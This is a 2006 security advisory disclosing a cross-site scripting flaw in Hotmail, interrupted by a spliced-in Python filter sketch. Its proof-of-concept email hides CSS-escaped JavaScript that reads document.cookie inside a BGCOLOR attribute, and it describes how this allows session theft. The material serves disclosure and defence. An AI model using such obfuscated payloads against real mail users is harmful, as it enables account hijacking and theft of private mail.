Microsoft MSN Hotmail : Cross-Site Scripting Vulnerability

//----- Advisory

Program          : Microsoft MSN Hotmail
Homepage         : http://www.hotmail.com
Discovery        : 2006/01/28
Author Contacted : 2006/03/21
Found by         : crashfr at sysdream dot com
This Advisory    : nono2357 at sysdream dot com

//----- Application description

Hotmail is one of the most popular free "webmail" services: email that is accessible from anywhere on the planet via a standard web browser. Hotmail is developed by Microsoft.

//----- Description of vulnerability

Hotmail's filtering engine does not filter JavaScript sufficiently. It is possible to place JavaScript in the BGCOLOR attribute of the BODY tag by using CSS, and the script executes when the email is viewed. As the proof of concept shows, Hotmail rewrites BGCOLOR into a CSS background-color declaration on a DIV, so a semicolon in the attribute value lets further declarations be appended. The JavaScript must be Unicode-encoded (CSS escapes such as \006a) in order to fool the filter; this encoding is recognised by IE >= 6.

//----- Proof Of Concept

When the user sends the following email:

<html>
<body bgcolor="#CCCCCC; background-image: url\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0064\006f\0063\0075\006d\0065\006e\0074\002e\0063\006f\006f\006b\0069\0065\0029'\0029">
<p>Found by http://www.sysdream.com !!!</p>
</body>
</html>

the victim receives the following email:

<div style="background-color:#CCCCCC;background-image:url\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0064\006f\0063\0075\006d\0065\006e\0074\002e\0063\006f\006f\006b\0069\0065\0029'\0029">
<p>Found by http://www.sysdream.com !!!</p>
</div>

//----- Impact

This vulnerability can be used to modify the webmail display, to gather the victim's cookies and to steal the victim's session. An attacker can then download all of the victim's emails and address book entries and send emails from the stolen account.

//----- Solution

Hotmail should filter JavaScript in CSS attributes.
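As an added defensive illustration, not part of the original advisory or of Hotmail's filter, the Python below applies the two checks the proof of concept calls for: a strict colour grammar for BGCOLOR before it is copied into a style declaration, and a script-URL check on style values performed only after CSS escapes (the \006a sequences above) have been decoded and whitespace folded. The regexes, function names and scanner class are my own assumptions about how such a filter could be structured.

```python
import re
from html.parser import HTMLParser

# CSS escape: backslash, 1-6 hex digits, optional trailing whitespace (CSS 2.1 syntax).
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\r\n\f]?")
# Strict colour token: the only thing a filter should copy from BGCOLOR into a style.
_STRICT_COLOR = re.compile(r"^(#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6}|[a-zA-Z]{1,20})$")
# Script-bearing CSS, matched after escapes are decoded and whitespace is folded.
_SCRIPT_CSS = re.compile(r"url\(['\"]?(javascript|vbscript):|expression\(")
COLOR_ATTRS = ("bgcolor", "text", "link", "vlink", "alink", "color")

def decode_css_escapes(value):
    """Turn \\006a-style escapes back into the characters they encode."""
    def repl(m):
        cp = int(m.group(1), 16)
        return chr(cp) if 0 < cp <= 0x10FFFF else "\ufffd"
    return _CSS_ESCAPE.sub(repl, value)

def css_contains_script(value):
    """Decode, drop whitespace/control chars, lowercase, then look for script URLs."""
    folded = re.sub(r"[\x00-\x20]", "", decode_css_escapes(value)).lower()
    return bool(_SCRIPT_CSS.search(folded))

def is_strict_color(value):
    """Accept '#CCCCCC'; reject '#CCCCCC; background-image: ...'."""
    return bool(_STRICT_COLOR.match(value.strip()))

class CssScriptScanner(HTMLParser):
    """Collect (tag, attribute) pairs whose value smuggles script through CSS."""
    def __init__(self):
        super().__init__()
        self.findings = []
    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None:
                continue
            if (name == "style" and css_contains_script(value)) or (
                    name in COLOR_ATTRS and not is_strict_color(value)):
                self.findings.append((tag, name))

def scan_html(html):
    scanner = CssScriptScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# The BGCOLOR value from the advisory's proof of concept (backslashes doubled for Python).
POC_BGCOLOR = ("#CCCCCC; background-image: url\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072"
               "\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028\\0064\\006f\\0063\\0075"
               "\\006d\\0065\\006e\\0074\\002e\\0063\\006f\\006f\\006b\\0069\\0065\\0029'\\0029")
```

Running `decode_css_escapes(POC_BGCOLOR)` shows the payload the filter never saw in clear text, and `scan_html` flags both the sent BODY/BGCOLOR form and the rewritten DIV/style form.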
//----- Credits

http://www.sysdream.com
http://www.nuitduhack.com/accueil_en-nuit-du-hack-2006.htm
crashfr at sysdream dot com

//----- Greetings

nono2357